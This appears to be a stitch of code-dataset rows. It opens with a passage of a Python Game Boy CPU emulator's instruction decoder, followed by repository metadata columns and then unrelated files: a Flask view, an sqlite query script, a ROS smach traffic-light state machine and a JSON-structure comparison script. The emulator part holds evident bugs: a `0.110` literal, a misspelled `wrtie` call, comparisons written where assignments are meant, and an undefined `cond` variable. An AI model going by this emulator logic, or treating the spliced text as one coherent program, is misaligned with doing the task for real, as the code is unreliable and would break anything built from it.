bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1) | self.reg.cy
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b001):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b01)
tmp = (tmp >> 1) | (bit << 7)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bit = tmp & 0b01
tmp = (tmp >> 1) | (bit << 7)
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b011):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b01)
tmp = (tmp >> 1) | (self.reg.cy << 7)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl") #NOTE: so this is not what the manual said the opcode was, but the manual seems wrong. so if there weird issues later it could be this
tmp = self.mem.read(memaddr)
bit = tmp & 0b01
tmp = (tmp >> 1) | (self.reg.cy << 7)
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b100):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1)
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b101):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bitL = (tmp & 0b01)
bitH = tmp & 0b10000000
tmp = (tmp >> 1) | bitH
self.reg.setFlag('cy', bitL)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bitL = tmp & 0b01
bitH = tmp & 0b10000000
tmp = (tmp >> 1) | bitH
self.reg.setFlag('cy', bitL)
self.mem.write(memaddr, tmp)
elif(self.r == 0b111):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b01)
tmp = (tmp >> 1)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bit = tmp & 0b01
tmp = (tmp >> 1)
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b110):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
low4 = (tmp & 0b01111)
high4 = (tmp & 0b11110000)
tmp = (low4 << 4) | (high4 >> 4)
self.reg.setReg(self.rp, tmp)
self.reg.setFlag('cy', 0)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
low4 = (tmp & 0b01111)
high4 = (tmp & 0b11110000)
tmp = (low4 << 4) | (high4 >> 4)
self.mem.write(memaddr, tmp)
self.reg.setFlag('cy', 0)
self.reg.setFlag('z', 1 if tmp == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('h', 0)
#Bit operations
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b011):
self.fetch()
self.decode()
if(self. opcode == 1 and self.rp != 0b110): #move compliment of selected bit to the Zero flags
tmp = self.reg.getReg(self.rp)
if(self.r == 0b000):
bit = tmp & 0b00000001
elif(self.r == 0b001):
bit = (tmp & 0b00000010) >> 1
elif(self.r == 0b010):
bit = (tmp & 0b00000100) >> 2
elif(self.r == 0b011):
bit = (tmp & 0b00001000) >> 3
elif(self.r == 0b100):
bit = (tmp & 0b00010000) >> 4
elif(self.r == 0b101):
bit = (tmp & 0b00100000) >> 5
elif(self.r == 0b110):
bit = (tmp & 0b01000000) >> 6
elif(self.r == 0b111):
bit = (tmp & 0b10000000) >> 7
self.reg.setFlag('z', ~bit)
self.reg.setFlag('h', 1)
self.reg.setFlag('n', 0)
elif(self.opcode == 1 and self.rp == 0b110): #move compliment of selected bit to the Zero flags
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
if(self.r == 0b000):
bit = tmp & 0b00000001
elif(self.r == 0b001):
bit = (tmp & 0b00000010) >> 1
elif(self.r == 0b010):
bit = (tmp & 0b00000100) >> 2
elif(self.r == 0b011):
bit = (tmp & 0b00001000) >> 3
elif(self.r == 0b100):
bit = (tmp & 0b00010000) >> 4
elif(self.r == 0b101):
bit = (tmp & 0b00100000) >> 5
elif(self.r == 0b110):
bit = (tmp & 0b01000000) >> 6
elif(self.r == 0b111):
bit = (tmp & 0b10000000) >> 7
self.reg.setFlag('z', ~bit)
self.reg.setFlag('h', 1)
self.reg.setFlag('n', 0)
elif(self.opcode == 3 and self.rp != 0.110): #set bit to 1
tmp = self.reg.getReg(self.rp)
if(self.r == 0b000):
tmp = tmp | 0b00000001
elif(self.r == 0b001):
tmp = tmp | 0b00000010
elif(self.r == 0b010):
tmp = tmp | 0b00000100
elif(self.r == 0b011):
tmp = tmp | 0b00001000
elif(self.r == 0b100):
tmp = tmp | 0b00010000
elif(self.r == 0b101):
tmp = tmp | 0b00100000
elif(self.r == 0b110):
tmp = tmp | 0b01000000
elif(self.r == 0b111):
tmp = tmp | 0b10000000
self.reg.setReg(self.rp, tmp)
elif(self.opcode == 3 and self.rp == 0b110): #set bit to 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
if(self.r == 0b000):
tmp = tmp | 0b00000001
elif(self.r == 0b001):
tmp = tmp | 0b00000010
elif(self.r == 0b010):
tmp = tmp | 0b00000100
elif(self.r == 0b011):
tmp = tmp | 0b00001000
elif(self.r == 0b100):
tmp = tmp | 0b00010000
elif(self.r == 0b101):
tmp = tmp | 0b00100000
elif(self.r == 0b110):
tmp = tmp | 0b01000000
elif(self.r == 0b111):
tmp = tmp | 0b10000000
self.mem.write(memaddr, tmp)
elif(self.opcode == 3 and self.rp != 0b110): #set bit to 0
tmp = self.reg.getReg(self.rp)
if(self.r == 0b000):
tmp = tmp & 0b11111110
elif(self.r == 0b001):
tmp = tmp & 0b11111101
elif(self.r == 0b010):
tmp = tmp & 0b11111011
elif(self.r == 0b011):
tmp = tmp & 0b11110111
elif(self.r == 0b100):
tmp = tmp & 0b11101111
elif(self.r == 0b101):
tmp = tmp & 0b11011111
elif(self.r == 0b110):
tmp = tmp & 0b10111111
elif(self.r == 0b111):
tmp = tmp & 0b01111111
self.reg.setReg(self.rp, tmp)
elif(self.opcode == 3 and self.rp == 0b110): #set bit to 0
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
if(self.r == 0b000):
tmp = tmp & 0b11111110
elif(self.r == 0b001):
tmp = tmp & 0b11111101
elif(self.r == 0b010):
tmp = tmp & 0b11111011
elif(self.r == 0b011):
tmp = tmp & 0b11110111
elif(self.r == 0b100):
tmp = tmp & 0b11101111
elif(self.r == 0b101):
tmp = tmp & 0b11011111
elif(self.r == 0b110):
tmp = tmp & 0b10111111
elif(self.r == 0b111):
tmp = tmp & 0b01111111
self.mem.write(memaddr, tmp)
#jump instructions
elif(self.opcode == 3 and self.r == 0b000 and self.rp == 0b011): #PC <- nn
self.fetch()
self.decode()
addr = self.n
self.fetch()
self.decode()
addr = (self.n << 8) | addr
self.reg.pc = addr
elif(self.opcode == 3 and self.r < 4 and self.rp == 0b010): #conditional jump
cond = self.r
self.fetch()
self.decode()
addr = self.n
self.fetch()
self.decode()
addr = (self.n << 8) | addr
if(cond == 0b000 and self.reg.z == 0):
self.reg.pc = addr
elif(cond == 0b001 and self.reg.z == 1):
self.reg.pc = addr
elif(cond == 0b010 and self.reg.cy == 0):
self.reg.pc = addr
elif(cond == 0b011 and self.reg.cy == 1):
self.reg.pc = addr
elif(self.opcode == 0 and self.r == 0b011 and self.rp == 0b000): #relative jump PC <- PC + e
self.fetch()
self.decode()
self.reg.pc = self.reg.pc + self.n + 1 #NOTE: I do not know if I need the one there
elif(self.opcode == 0 and self.r > 3 and self.rp == 0b000): #conditional relative jump
cond = self.r
self.fetch()
self.decode()
if(cond == 0b000 and self.reg.z == 0):
self.reg.pc = self.reg.pc + self.n
elif(cond == 0b001 and self.reg.z == 1):
self.reg.pc = self.reg.pc + self.n
elif(cond == 0b010 and self.reg.cy == 0):
self.reg.pc = self.reg.pc + self.n
elif(cond == 0b011 and self.reg.cy == 1):
self.reg.pc = self.reg.pc + self.n
elif(self.opcode == 3 and self.r == 0b101 and self.rp == 0b001): #jump to mem[HL]
memaddr = self.reg.getPair("hl")
self.reg.pc = self.mem.read(memaddr)
#Call and Return instructions
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b101): #mem[SP - 1, - 2] <- PC, PC <- nn, SP <- SP - 2
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(self.opcode == 3 and self.r < 4 and self.rp == 0b100): #conditional Call
if(cond == 0b000 and self.reg.z == 0):
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(cond == 0b001 and self.reg.z == 1):
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(cond == 0b010 and self.reg.cy == 0):
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(cond == 0b011 and self.reg.cy == 1):
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b001): #Return PC <- mem[SP], SP <- SP + 2
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(self.opcode == 3 and self.r == 0b011 and self.rp == 0b001): #Return from Interupt PC <- mem[SP], SP <- SP + 2
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(self.opcode == 3 and self.r < 4 and self.rp == 0b000): #Conditional Return
if(cond == 0b000 and self.reg.z == 0):
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(cond == 0b001 and self.reg.z == 1):
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(cond == 0b010 and self.reg.cy == 0):
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(cond == 0b011 and self.reg.cy == 1):
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(self.opcode == 3 and self.rp == 0b111): #RST
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, self.pc >> 8)
self.mem.wrtie(memaddr - 2, self.pc & 0b11111111)
self.reg.setReg("sp", memaddr - 2)
if(self.r == 0b000):
self.reg.pc = 0x00
elif(self.r == 0b001):
self.reg.pc = 0x08
elif(self.r == 0b010):
self.reg.pc = 0x10
elif(self.r == 0b011):
self.reg.pc = 0x18
elif(self.r == 0b100):
self.reg.pc = 0x20
elif(self.r == 0b101):
self.reg.pc = 0x28
elif(self.r == 0b110):
self.reg.pc = 0x30
elif(self.r == 0b111):
self.reg.pc = 0x38
#General Purpose Insructions
elif(self.opcode == 0 and self.r == 0b101 and self.rp == 0b111): #invert
tmp = self.reg.getReg(self.reg.RegA)
self.reg.setReg(self.reg.RegA, ~tmp)
self.reg.setFlag('h', 1)
self.reg.setFlag('n', 1)
elif(self.opcode == 0 and self.r == 0b000 and self.rp == 0b000): #NOP
pass
elif(self.opcode == 1 and self.r == 0b110 and self.rp == 0b110): #Halt
#I think this works...
memaddr = self.reg.getReg('sp')
self.mem.write(memaddr + 1, pc & 0b11111111)
self.mem.write(memaddr + 2, pc >> 8)
return -2
elif(self.opcode == 0 and self.r == 0b010 and self.rp == 0b000): #stop
#reset all the flags
self.fetch()
self.decode()
if(self.n == 0):
return -1
elif(self.opcode == 0 and self.r == 0b100 and self.rp == 0b111): #binary coded decimal adjustment
self.reg.setReg(self.reg.RegA, self.bcd)
self.reg.setFlag('cy', self.bcdcy)
self.reg.setFlag('h', 0)
self.reg.setFlag('z', 1 if self.bcd == 0 else 0)
self.prev = self.inst
print(self.opcode, self.r, self.rp, self.n)
return 0
def BCDCalc(add, n, cy, h, A): #calculate what the BCD Result would be if needed. return A, CY
low == A & 0b1111
high == (A & 0b11110000) >> 4
if (add and n == 0): #must adjust the A value for addition
if(cy == 0 and h == 0):
if(high <= 0x9 and low <= 0x9):
return A, 0
elif(high <= 0x8 and low >= 0xA):
return A + 0x06, 0
elif(high >= 0xA and low <= 0x9):
return A + 0x60, 1
elif(high >= 0x9 and low >= 0xA):
return A + 0x66, 1
elif(cy == 0 and h == 1):
if(high <= 0x9 and low <= 0x3):
return A + 0x06, 0
elif(high >= 0xA and low <= 0x03):
return A + 0x66, 1
elif(cy == 1 and h == 0):
if(high < 0x2):
if(low <= 0x9):
return A + 0x06, 1
else:
return A + 0x66, 1
elif(cy == 1 and h == 1):
if(high <= 0x03 and low <= 0x03):
return A + 0x66, 1
elif(not add and n == 1): #Adjust A for subtraction
if(cy == 0 and h == 0 and high <= 0x9 and low <= 0x9):
return A, 0
elif(cy == 0 and h == 1 and high <= 0x8 and low >= 0x6):
return A + 0xFA, 0
elif(cy == 1 and h == 0 and high >= 0x7 and low <= 0x9):
return A + 0xA, 1
elif(cy == 1 and h == 1 and high >= 0x6 and low >= 0x6):
return A + 0x9A, 1
#No adjustment
return A, cy
class Memory():
"""Class for reading and writing to the memory"""
def __init__(self):
self.mem = [0] * 0xFFFF #Create an array the size of the GameBoy's memory
def read(self, address):
if(address > 0xFFFE):
raise ValueError("Address out of memory")
else:
return self.mem[address]
def write(self, address, value):
if (address > 0xFFFE):
raise ValueError("Address out of memory")
else:
self.mem[address] = value
| 39.201625
| 187
| 0.452119
| 6,745
| 53,079
| 3.556116
| 0.048332
| 0.144751
| 0.094555
| 0.041899
| 0.832694
| 0.800425
| 0.778954
| 0.762737
| 0.731885
| 0.715501
| 0
| 0.098936
| 0.406639
| 53,079
| 1,353
| 188
| 39.230599
| 0.662645
| 0.056312
| 0
| 0.719388
| 0
| 0
| 0.009733
| 0
| 0
| 0
| 0.004206
| 0.000739
| 0
| 1
| 0.013605
| false
| 0.00085
| 0
| 0.001701
| 0.036565
| 0.00085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9bcb95ff91276777349e2f23e0fb8c375818b6bc
| 138
|
py
|
Python
|
view.py
|
PashaKim/flask_blog_test
|
85b55f412cfb7bdcad364367add20e9c9fdc2f5d
|
[
"MIT"
] | null | null | null |
view.py
|
PashaKim/flask_blog_test
|
85b55f412cfb7bdcad364367add20e9c9fdc2f5d
|
[
"MIT"
] | null | null | null |
view.py
|
PashaKim/flask_blog_test
|
85b55f412cfb7bdcad364367add20e9c9fdc2f5d
|
[
"MIT"
] | null | null | null |
from app import app
from flask import render_template
@app.route('/')
def index():
return render_template('index.html', name='Pavlo')
| 23
| 54
| 0.731884
| 20
| 138
| 4.95
| 0.65
| 0.282828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 138
| 5
| 55
| 27.6
| 0.825
| 0
| 0
| 0
| 0
| 0
| 0.115942
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
9bdaaf17be3df792361e808379913ed6e3fcccec
| 1,150
|
py
|
Python
|
Databases using SQLite3/Like Clause.py
|
TausifAnsari/PyHub
|
f6c949dc6a3974f57d7d146708443d0ceeb4418f
|
[
"MIT"
] | 1
|
2020-09-30T19:31:20.000Z
|
2020-09-30T19:31:20.000Z
|
Databases using SQLite3/Like Clause.py
|
TanviSutar/PyHub
|
6281e9f515674fb51f0d0862c26ec18020fa7d83
|
[
"MIT"
] | null | null | null |
Databases using SQLite3/Like Clause.py
|
TanviSutar/PyHub
|
6281e9f515674fb51f0d0862c26ec18020fa7d83
|
[
"MIT"
] | null | null | null |
import sqlite3
connection = sqlite3.connect("assets/Student_records.db")
cursor = connection.cursor()
print("PRINTING NAMES STARTING WITH A")
query = """SELECT NAMES,MARKS FROM Student_Records WHERE NAMES LIKE 'a%' """ # Names starting with a
cursor.execute(query)
student_record = cursor.fetchall()
for names,marks in student_record:
print(names,marks)
connection.close()
print("\nPRINTING NAMES ENDING WITH I")
connection = sqlite3.connect("assets/Student_records.db")
cursor = connection.cursor()
query = """SELECT NAMES,MARKS FROM Student_Records WHERE NAMES LIKE '%i' """ # Names ending with a
cursor.execute(query)
student_record = cursor.fetchall()
for names,marks in student_record:
print(names,marks)
connection.close()
print("\nPRINTING NAMES WITH ID IN THEM")
connection = sqlite3.connect("assets/Student_records.db")
cursor = connection.cursor()
query = """SELECT NAMES,MARKS FROM Student_Records WHERE NAMES LIKE '%id%' """ # Names that has id in them
cursor.execute(query)
student_record = cursor.fetchall()
for names,marks in student_record:
print(names,marks)
connection.close()
input("Press any key to exit ")
| 35.9375
| 109
| 0.755652
| 158
| 1,150
| 5.424051
| 0.253165
| 0.105018
| 0.084014
| 0.105018
| 0.84014
| 0.84014
| 0.84014
| 0.84014
| 0.84014
| 0.84014
| 0
| 0.00398
| 0.126087
| 1,150
| 32
| 110
| 35.9375
| 0.848756
| 0.058261
| 0
| 0.724138
| 0
| 0
| 0.349074
| 0.069444
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.034483
| 0.206897
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
500720a8e98544696ac21ffb3aacc834e0fc40f3
| 3,714
|
py
|
Python
|
smach_minimal/scripts/traffic_lights.py
|
priteshgohil/minimal_ros_packages
|
17606b10ab1ffac7c0c933f6d540b2b015af706f
|
[
"MIT"
] | null | null | null |
smach_minimal/scripts/traffic_lights.py
|
priteshgohil/minimal_ros_packages
|
17606b10ab1ffac7c0c933f6d540b2b015af706f
|
[
"MIT"
] | null | null | null |
smach_minimal/scripts/traffic_lights.py
|
priteshgohil/minimal_ros_packages
|
17606b10ab1ffac7c0c933f6d540b2b015af706f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
"""
#with user input
# define state Red
class Red(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['Wait'], output_keys=['prev_state'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('***Executing state Red***')
rospy.sleep(1)
userdata.prev_state = 'red'
return 'Wait'
# define state Yellow
class Yellow(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['Continue', 'Stop'], input_keys=['prev_state'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('***Executing state Yellow***')
rospy.sleep(1)
if userdata.prev_state == 'green':
return 'Stop'
if userdata.prev_state == 'red':
return 'Continue'
#define state green
class Green(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['Wait'],output_keys=['prev_state'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('***Executing state Green***')
rospy.sleep(1)
userdata.prev_state = 'green'
return 'Wait'
def main():
rospy.init_node('traffic_lights')
# flag=0
# Create a SMACH state machine
sm = smach.StateMachine(outcomes=['Done'])
# Open the container
with sm:
# Add states to the container
smach.StateMachine.add('RED', Red(),
transitions={'Wait':'YELLOW'})
smach.StateMachine.add('YELLOW', Yellow(),
transitions={'Stop':'RED',
'Continue':'GREEN'})
smach.StateMachine.add('GREEN', Green(),
transitions={'Wait':'YELLOW'})
# Execute SMACH plan
outcome = sm.execute()
if __name__ == '__main__':
main()
"""
# define state Red
class Red(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['Stop','Continue'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('***Executing state Red***')
rospy.sleep(1)
#return 'Stop'
if self.counter<3:
self.counter +=1
return 'Stop'
else:
return 'Continue'
# define state Yellow
class Yellow(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['Stop', 'Continue'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('***Executing state Yellow***')
rospy.sleep(1)
if self.counter<3:
self.counter+=1
return 'Continue'
else:
return 'Stop'
#define state green
class Green(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['Go', 'Stop'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('***Executing state Green***')
rospy.sleep(1)
#return 'Go'
if self.counter<3:
self.counter +=1
return 'Go'
else:
return 'Stop'
def main():
rospy.init_node('traffic_lights')
# flag=0
# Create a SMACH state machine
sm = smach.StateMachine(outcomes=['Done'])
# Open the container
with sm:
# Add states to the container
smach.StateMachine.add('RED', Red(),
transitions={'Stop':'RED',
'Continue':'YELLOW'})
smach.StateMachine.add('YELLOW', Yellow(),
transitions={'Stop':'RED',
'Continue':'GREEN'})
smach.StateMachine.add('GREEN', Green(),
transitions={'Stop':'YELLOW',
'Go':'GREEN'})
# Execute SMACH plan
outcome = sm.execute()
if __name__ == '__main__':
main()
| 25.094595
| 92
| 0.582391
| 418
| 3,714
| 4.985646
| 0.148325
| 0.067179
| 0.037428
| 0.048944
| 0.882438
| 0.846929
| 0.830614
| 0.830614
| 0.785509
| 0.785509
| 0
| 0.007402
| 0.272483
| 3,714
| 147
| 93
| 25.265306
| 0.763879
| 0.05412
| 0
| 0.535714
| 0
| 0
| 0.138614
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.071429
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
500832c01a4b872cb5f8446810ebcbeda109758d
| 88,229
|
py
|
Python
|
backend/test.py
|
wuchaofan1654/tester
|
ff38d42e06cbdfa04882e8e95ada2dd93e6609f2
|
[
"MIT"
] | null | null | null |
backend/test.py
|
wuchaofan1654/tester
|
ff38d42e06cbdfa04882e8e95ada2dd93e6609f2
|
[
"MIT"
] | null | null | null |
backend/test.py
|
wuchaofan1654/tester
|
ff38d42e06cbdfa04882e8e95ada2dd93e6609f2
|
[
"MIT"
] | null | null | null |
# _*_ coding=utf-8 _*_
"""
@version: python3.6.4
@auth: created by sandy
@time: 2018/9/10 14:04
@software: PyCharm
@desc: // 比对json数据结构
"""
def compare_json_construction(dict1, dict2):
# 判断是否是字典格式
assert isinstance(dict1, dict)
assert isinstance(dict2, dict)
# 遍历key是否相等
for k, v in dict1.items():
# 如果不相等,直接返回false
if k not in dict2.keys():
return False
print(k)
assert type(v) == type(dict2.get(k))
_v = dict2[k]
# 判断value类型,列表只取第一个比较
if v and isinstance(v, list):
v = v[0]
if _v and isinstance(_v, list):
_v = dict2[k][0]
else:
return False
# value类型为dict,递归
if isinstance(v, dict):
compare_json_construction(v, _v)
return True
d1 = {
"errorCode": "0",
"errorMsg": "success",
"responseData": {
"has_more": 1,
"share_info": {
"share_post_video_yn": 1,
"share_post_video_img": "http:\/\/img2.soyoung.com\/message\/ios\/20180823\/6\/dfdb99aa103ddcaf40c1826030ace91e_600_300.jpg",
"share_image": "http:\/\/img2.soyoung.com\/message\/ios\/20180823\/6\/dfdb99aa103ddcaf40c1826030ace91e.jpg",
"share_url": "https:\/\/m.sy.soyoung.com\/post\/question?question_id=1",
"share_title": "1.开眼角达人,就喜欢做双眼皮。馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢\",\"share_desc\":\"馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好",
"share_desc": ">>>><<<<馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢",
"share_pictorial_title": "精选问题",
"share_pictorial_user_name": "匿名用户",
"share_pictorial_user_avatar": "http:\/\/img2.soyoung.com\/anonymous.png",
"share_pictorial_post_video_yn": 1,
"share_pictorial_image": [
"http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e_301_301.jpg"
],
"share_pictorial_content": "1.开眼角达人,就喜欢做双眼皮。馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢\",\"share_desc\":\"馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好"
},
"question_info": {
"cover_img": {},
"create_date": "2018-08-22 09:13:35",
"answer_cnt": "30",
"create_date_str": "发布于8月22日",
"images": [
{
"u": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e_301_301.jpg",
"w": "1242",
"h": "1242",
"o": "1",
"u_y": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e.jpg"
},
{
"u": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e_301_301.jpg",
"w": "1242",
"h": "1242",
"o": "2",
"u_y": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e.jpg"
},
{
"u": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e_301_301.jpg",
"w": "1242",
"h": "1242",
"o": "3",
"u_y": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e.jpg"
}
],
"question_content": "1.开眼角达人,就喜欢做双眼皮。馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢\",\"share_desc\":\"馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好",
"question_id": "1",
"post_id": "18520832",
"menu_ids": [
"10003"
],
"video": {
"duration": "00.07",
